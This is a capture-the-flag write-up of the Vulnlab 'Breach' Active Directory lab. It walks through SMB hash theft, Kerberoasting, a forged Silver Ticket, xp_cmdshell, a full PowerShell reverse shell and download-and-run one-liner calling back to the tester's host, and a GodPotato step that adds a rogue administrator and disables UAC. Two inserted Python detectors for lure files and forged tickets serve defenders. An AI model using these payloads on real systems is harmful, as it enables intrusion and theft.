Vulnlab - Breach

Introduction

This post describes a complete attack chain executed in a practice lab environment. The process began with enumerating exposed services, followed by exploiting writable SMB shares to capture NTLMv2 hashes. The credentials obtained were used to perform Kerberoasting, and the cracked service account credentials facilitated a Silver Ticket attack to gain administrative control. Each step is detailed below, highlighting the vulnerabilities and exploitation techniques.

Nmap

An initial scan of the target revealed several open ports and services. These are the key findings:

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
636/tcp   open  tcpwrapped    syn-ack ttl 127
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-05-28T06:51:23+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-28T06:30:37
| Not valid after:  2053-05-28T06:30:37
| MD5:   3f3c510f52fbda721e04a6cc753b2ee4
| SHA-1: 5a4d69337171f01588e19913fd165aaad5302f7d
| ms-sql-ntlm-info: 
|   10.10.104.77:1433: 
|     Target_Name: BREACH
|     NetBIOS_Domain_Name: BREACH
|     NetBIOS_Computer_Name: BREACHDC
|     DNS_Domain_Name: breach.vl
|     DNS_Computer_Name: BREACHDC.breach.vl
|     DNS_Tree_Name: breach.vl
|_    Product_Version: 10.0.20348
| ms-sql-info: 
|   10.10.104.77:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-27T06:29:05
| Not valid after:  2023-11-26T06:29:05
| MD5:   1e92160c4f82fc5ab03f9acff4440a2b
| SHA-1: 67edf25a48df793d8481abefc608ff160a7104b6
|_ssl-date: 2023-05-28T06:51:23+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-05-28T06:50:43+00:00
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53054/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
58013/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Notably, SMB (445/tcp) allowed guest access, and the MS-SQL service provided valuable information about the domain (breach.vl).

Enumeration

Using netexec with the guest account, SMB shares were enumerated, revealing a writable share named share:

└─$ netexec smb 10.10.118.159 -u 'guest' -p '' --shares
SMB         10.10.118.159   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB         10.10.118.159   445    BREACHDC         [+] breach.vl\guest: 
SMB         10.10.118.159   445    BREACHDC         [*] Enumerated shares
SMB         10.10.118.159   445    BREACHDC         Share           Permissions     Remark
SMB         10.10.118.159   445    BREACHDC         -----           -----------     ------
SMB         10.10.118.159   445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.10.118.159   445    BREACHDC         C$                              Default share
SMB         10.10.118.159   445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.10.118.159   445    BREACHDC         NETLOGON                        Logon server share 
SMB         10.10.118.159   445    BREACHDC         share           READ,WRITE      
SMB         10.10.118.159   445    BREACHDC         SYSVOL                          Logon server share 
SMB         10.10.118.159   445    BREACHDC         Users           READ

The writable access indicated potential opportunities for hash theft or payload execution.

Exploitation

Stealing NTLMv2 Hashes

The writable share was leveraged to steal NTLMv2 hashes using crafted files generated by Hashgrab:

└─$ sudo hashgrab 10.8.4.110 security                      
[*] Generating hash grabbing files..
[*] Written @security.scf
[*] Written @security.url
[*] Written security.library-ms
[*] Written desktop.ini
[*] Written lnk_584.ico
[+] Done, upload files to smb share and capture hashes with smbserver.py/responder
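
A defender-side counterpart, added here and not part of the write-up: a scanner that flags files of the types hashgrab writes whose icon or location fields point at a UNC host, which is what turns a browsed folder into a hash-capture trap. The sample share contents (and the host 10.8.4.110 in them) are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Matches a UNC prefix (\\host) and captures the host Explorer would
# authenticate to when it resolves the reference.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9][A-Za-z0-9.\-_]*)")
# INI keys in .scf/.url/desktop.ini that Explorer resolves on folder view.
INI_KEYS = ("iconfile", "iconresource")
# Library definitions (.library-ms) carry their location in a <url> element.
URL_TAG_RE = re.compile(r"<url>\s*([^<]+?)\s*</url>", re.IGNORECASE)

def find_unc_lures(files: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (file name, field, remote host) for each auto-resolved UNC reference."""
    hits = []
    for name, text in files.items():
        lower = name.lower()
        if lower.endswith(".library-ms"):
            for m in URL_TAG_RE.finditer(text):
                unc = UNC_RE.search(m.group(1))
                if unc:
                    hits.append((name, "url", unc.group(1)))
        elif lower.endswith((".scf", ".url")) or lower == "desktop.ini":
            for line in text.splitlines():
                key, sep, value = line.partition("=")
                if sep and key.strip().lower() in INI_KEYS:
                    unc = UNC_RE.search(value)
                    if unc:
                        hits.append((name, key.strip(), unc.group(1)))
    return hits

# Constructed sample of a share folder: four lure files of the kinds hashgrab
# writes, all pointing at the tester's host, plus one benign shortcut.
SAMPLE_SHARE = {
    "@security.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.8.4.110\\share\\icon.ico\r\n",
    "@security.url": "[InternetShortcut]\r\nURL=https://intranet.breach.vl\r\n"
                     "IconFile=\\\\10.8.4.110\\share\\icon.ico\r\n",
    "desktop.ini": "[.ShellClassInfo]\r\nIconResource=\\\\10.8.4.110\\share\\lnk_584.ico,0\r\n",
    "security.library-ms": "<libraryDescription><searchConnectorDescriptionList>"
                           "<searchConnectorDescription><simpleLocation>"
                           "<url>\\\\10.8.4.110\\share</url></simpleLocation>"
                           "</searchConnectorDescription></searchConnectorDescriptionList>"
                           "</libraryDescription>",
    "report.url": "[InternetShortcut]\r\nURL=https://intranet.breach.vl/report\r\n"
                  "IconFile=C:\\Windows\\System32\\shell32.dll\r\nIconIndex=3\r\n",
}

if __name__ == "__main__":
    for name, field, host in find_unc_lures(SAMPLE_SHARE):
        print(f"{name}: {field} points at \\\\{host}")
```

Run against a copy of the share's contents, only the four lure files are reported; the shortcut with a local icon path is left alone.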

The generated files were uploaded to share/transfer/:

└─$ smbclientng --host 10.10.118.159 -u 'guest' -p ''
...
■[\\10.10.118.159\share\transfer\]> put security.lnk
security.lnk
'security.lnk' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 986/986 bytes • ? • 0:00:00

Responder was run to capture the NTLMv2 hash of Julia.Wong:

└─$ sudo responder -I tun0
...
[SMB] NTLMv2-SSP Client   : 10.10.118.159
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:138a7d95e21ecdf7:AE68D9F8DB7677A2D49FF395BF87ADD1:01010...0000

Using hashcat, the password Computer1 was cracked:

└─$ hashcat -m 5600 -a 0 julia.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...

User Flag

With valid credentials (Julia.Wong:Computer1), the share was accessed over SMB and the user flag was found in the user's directory:

└─$ smbclientng --host 10.10.118.159 -u 'Julia.Wong' -p 'Computer1'
...
■[\\10.10.118.159\share\transfer\julia.wong\]> cat local.txt
VL{CENSORED}

Kerberoasting for Service Account Credentials

The user account was used to request Kerberos service tickets (TGS) for a service account (svc_mssql):

└─$ sudo impacket-GetUserSPNs -dc-ip 10.10.96.166 -request -outputfile hashes.kerberoast breach.vl/'Julia.Wong':'Computer1'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation 
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 11:43:08.106169  2024-12-18 08:13:37.014622

The hash was cracked using hashcat, revealing the password Trustno1.

└─$ hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$f007d990...216d:Trustno1
...

Privilege Escalation

Silver Ticket Attack

Gathering Required Information

To execute a Silver Ticket attack, the following data was collected:

  1. Domain SID: Obtained with ldapsearch, decoding the base64-encoded objectSid attribute with a short Python script:
└─$ sudo ldapsearch -x -H ldap://10.10.92.130 -D "svc_mssql" -w "Trustno1" -b "DC=breach,DC=vl" "(objectClass=domain)" | grep objectSid | awk '{print $2}' | python3 -c "
import base64, struct, sys
sid_base64 = sys.stdin.read().strip()  # read the base64 value from standard input
binary_sid = base64.b64decode(sid_base64)
version = binary_sid[0]
identifier_authority = int.from_bytes(binary_sid[2:8], byteorder='big')
sub_authorities = struct.unpack('<' + 'I' * binary_sid[1], binary_sid[8:])  # binary_sid[1] is the sub-authority count
sid = f'S-{version}-{identifier_authority}' + ''.join(f'-{sub_auth}' for sub_auth in sub_authorities)
print(sid)"
S-1-5-21-2330692793-3312915120-706255856
  2. Service Principal Name (SPN): Identified earlier with impacket-GetUserSPNs as MSSQLSvc/breachdc.breach.vl:1433.
  3. NTLM Hash: Derived from the cracked svc_mssql password using Python:
└─$ python3 -c 'import hashlib; print(hashlib.new("md4", "Trustno1".encode("utf-16le")).hexdigest())'
69596c7aa1e8daee17f8e78870e25a5c

Creating the Silver Ticket

Using impacket-ticketer, a Silver Ticket for the MSSQLSvc SPN was forged with Administrator as the client principal, encrypted with the svc_mssql NT hash:

└─$ sudo impacket-ticketer -user svc_mssql -nthash 69596c7aa1e8daee17f8e78870e25a5c -dc-ip 10.10.92.130 -domain breach.vl -domain-sid S-1-5-21-2330692793-3312915120-706255856 -spn 'MSSQLSvc/breachdc.breach.vl:1433' Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

Using the Silver Ticket

The ticket was loaded into the current session by pointing KRB5CCNAME at the ccache file, and verified with klist:

└─$ export KRB5CCNAME=Administrator.ccache
└─$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@BREACH.VL

Valid starting       Expires              Service principal
12/18/2024 11:02:32  12/16/2034 11:02:32  MSSQLSvc/breachdc.breach.vl:1433@BREACH.VL
        renew until 12/16/2034 11:02:32
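
Detection angle on the listing above, added here as an example and not part of the write-up: a genuine KDC bounds service tickets by domain policy (600 minutes by default), whereas the forged ticket is valid for ten years. The parser below reads klist-style output and flags tickets whose lifetime exceeds that bound; the listing is constructed from the ticket above plus a normal TGT.

```python
from datetime import datetime
from typing import List, Tuple

KLIST_FMT = "%m/%d/%Y %H:%M:%S"          # timestamp format used by MIT klist

# Constructed listing: the forged MSSQLSvc ticket plus an ordinary 10-hour TGT.
SAMPLE_KLIST = """Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@BREACH.VL

Valid starting       Expires              Service principal
12/18/2024 11:02:32  12/16/2034 11:02:32  MSSQLSvc/breachdc.breach.vl:1433@BREACH.VL
        renew until 12/16/2034 11:02:32
12/18/2024 09:00:00  12/18/2024 19:00:00  krbtgt/BREACH.VL@BREACH.VL
        renew until 12/25/2024 09:00:00
"""

def parse_klist(text: str) -> List[Tuple[str, datetime, datetime]]:
    """Extract (service principal, valid starting, expires) from klist output."""
    tickets = []
    for line in text.splitlines():
        parts = line.split()
        # Ticket rows have exactly five fields: date time date time principal.
        # Header, cache lines and "renew until" rows either differ in field
        # count or fail to parse as timestamps, so they are skipped.
        if len(parts) != 5:
            continue
        try:
            start = datetime.strptime(f"{parts[0]} {parts[1]}", KLIST_FMT)
            end = datetime.strptime(f"{parts[2]} {parts[3]}", KLIST_FMT)
        except ValueError:
            continue
        tickets.append((parts[4], start, end))
    return tickets

def suspicious_tickets(text: str, max_hours: float = 10.0) -> List[Tuple[str, float]]:
    """Return (principal, lifetime in hours) for tickets living longer than max_hours."""
    flagged = []
    for spn, start, end in parse_klist(text):
        hours = (end - start).total_seconds() / 3600
        if hours > max_hours:
            flagged.append((spn, hours))
    return flagged

if __name__ == "__main__":
    for spn, hours in suspicious_tickets(SAMPLE_KLIST):
        print(f"{spn}: lifetime {hours:.0f} h exceeds policy")
```

On a domain controller the equivalent signal is a service ticket whose end time lies far beyond the policy maximum, since the KDC never issued it.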

Additionally, the hostname breachdc.breach.vl was added to /etc/hosts so that the SPN's host name resolves (the append must run as root, so the redirect goes through tee):

└─$ echo "10.10.92.130 breachdc.breach.vl" | sudo tee -a /etc/hosts

Gaining SQL Server Access

With the ticket loaded, the MSSQL service was accessed as the Administrator:

└─$ sudo impacket-mssqlclient breachdc.breach.vl -k -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)>

SQL commands enabled command execution through xp_cmdshell:

SQL (BREACH\Administrator  dbo@master)> EXEC sp_configure 'show advanced option',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> EXEC xp_cmdshell 'whoami';
output             
----------------   
breach\svc_mssql   

NULL               

SQL (BREACH\Administrator  dbo@master)>

Final Administrative Shell

A reverse shell was established by hosting a PowerShell script on a local PHP web server, to get past the antivirus, and executing it via xp_cmdshell:

└─$ cat shell.txt                                            
$TCPClient = New-Object Net.Sockets.TCPClient('10.8.4.110', 8787);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()

└─$ php -S 0.0.0.0:80 -t .

SQL command to execute the shell:

SQL (BREACH\Administrator  dbo@master)> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.8.4.110/shell.txt") | powershell -ep bypass -noprofile'

A connection was received on the listener:

└─$ nc -lnvp 8787                                                                             
listening on [any] 8787 ...
connect to [10.8.4.110] from (UNKNOWN) [10.10.92.130] 53960
SHELL> whoami
breach\svc_mssql
SHELL>

Elevating to System

The svc_mssql account had SeImpersonatePrivilege, enabling token impersonation:

SHELL> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SHELL>

Using GodPotato-NET4.exe, a new administrative user was created:

SHELL> iwr -uri http://10.8.4.110/GodPotato-NET4.exe -o GodPotato-NET4.exe
SHELL> .\GodPotato-NET4.exe -cmd "net user x4v1l0k password123! /add"
...
The command completed successfully.
SHELL> .\GodPotato-NET4.exe -cmd "net localgroup administrators x4v1l0k /add"
...
The command completed successfully.
SHELL> .\GodPotato-NET4.exe -cmd "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
...
The command completed successfully.
SHELL> .\GodPotato-NET4.exe -cmd "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
...
The command completed successfully.

With the user created and WinRM active, a connection was made with Evil-WinRM:

└─$ evil-winrm -i 10.10.92.130 -u x4v1l0k -p 'password123!'                        
*Evil-WinRM* PS C:\Users\x4v1l0k\Documents> cat C:\Users\Administrator\Desktop\root.txt
VL{CENSORED}